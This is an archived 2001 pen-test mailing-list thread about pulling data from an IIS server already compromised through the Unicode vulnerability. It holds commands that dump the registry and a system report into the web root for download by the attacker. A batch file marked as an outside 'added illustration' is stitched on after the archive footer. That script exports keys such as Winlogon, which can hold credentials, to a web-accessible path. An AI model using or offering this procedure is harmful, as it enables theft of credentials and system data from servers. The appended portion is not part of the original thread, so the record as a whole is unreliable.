regedit is nice. Allows you to import and export registry information to and from a text file.

regedit /e c:\inetpub\wwwroot\registry.txt

Will dump a copy of the registry to a text file (all you have access to read anyway). Then just view it with your browser.

http://target/registry.txt

Goes without saying this will be a VERY large file. It is possible to dump only parts of the registry with the regedit command. Can't remember how to do this off the top of my head. Have a look here.

http://www.microsoft.com/technet

Another good command to use with the Unicode exploit is

winmsd /a /f

This writes a system report to a text file. This gives you a lot of really useful information. The text file will be the name of the computer and is written to your working directory.

Note: This only works on IIS 4 (NT 4). If anyone knows of a way to get this information on Windows 2000 please let me know.

P

-----Original Message-----
From: Esmerelda Fruitenschlein [mailto:efruitenschleinat_private]
Sent: Friday, 5 October 2001 9:05 a.m.
To: pen-testat_private
Subject: Accessing registry through command line

I have remote execution of code through a Unicode vulnerability on an IIS box. I need to know if there is a way to get registry keys using only command line tools that are on a default NT install. (No file upload, not even using echo >, etc.) Perhaps something using rundll or some such thing?

Thanks.

Esmerelda Fruitenschlein, hacker extraordinaire

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service.
For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/

************************************************************
CAUTION: This e-mail and any attachment(s) contains information that is both confidential and possibly legally privileged. No reader may make any use of its content unless that use is approved by Deloitte separately in writing. Any opinion, advice or information contained in this e-mail and any attachment(s) is to be treated as interim and provisional only and for the strictly limited purpose of the recipient as communicated to us. Neither the recipient nor any other person should act upon it without our separate written authorisation of reliance. If you have received this message in error please notify us immediately and destroy this message. Thank you.
Deloitte Touche Tohmatsu
Internet: www.deloitte.co.nz
************************************************************
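The reply above says regedit can export just part of the registry but does not show how. As an added illustration (not from either poster), the batch file below uses the documented `regedit /e <file> [<key>]` form, which exports only the named key and its subkeys, and then runs the `winmsd /a /f` report from the web root so the output file lands somewhere the browser can fetch it. The web root path and the particular keys exported are assumptions chosen for the example; adjust them to the target.

```batch
@echo off
rem Added example, not code from the original thread.
rem Assumptions: the IIS web root is C:\Inetpub\wwwroot and the account the
rem commands run under can read the keys named below.

set OUT=C:\Inetpub\wwwroot

rem regedit /e <file> [<key>]  exports only <key> and its subkeys.
rem With no <key> argument it exports everything readable, which is the
rem very large file the reply warns about.  A .txt extension is used so the
rem web server will hand the file back as plain text.
regedit /e %OUT%\w3svc.txt "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters"
regedit /e %OUT%\run.txt "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
regedit /e %OUT%\winlogon.txt "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

rem NT 4 only (per the reply): winmsd /a /f writes a full system report
rem named <COMPUTERNAME>.txt into the current directory, so change into
rem the web root first.
cd /d %OUT%
winmsd /a /f

rem The exports are now reachable as http://target/w3svc.txt and so on.
rem They are readable by anyone who can reach the web server, so delete
rem them once fetched.
```

Two caveats worth knowing before relying on this: regedit only exports keys the calling account can read, so a locked-down key simply comes back empty rather than producing an error; and on Windows 2000 and later regedit writes its export in Unicode (UTF-16) with a "Windows Registry Editor Version 5.00" header, whereas NT 4 writes an ANSI "REGEDIT4" file, so a browser may show the 2000 output with embedded null characters unless you save it and open it locally.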
This archive was generated by hypermail 2b30 : Fri Oct 05 2001 - 18:42:49 PDT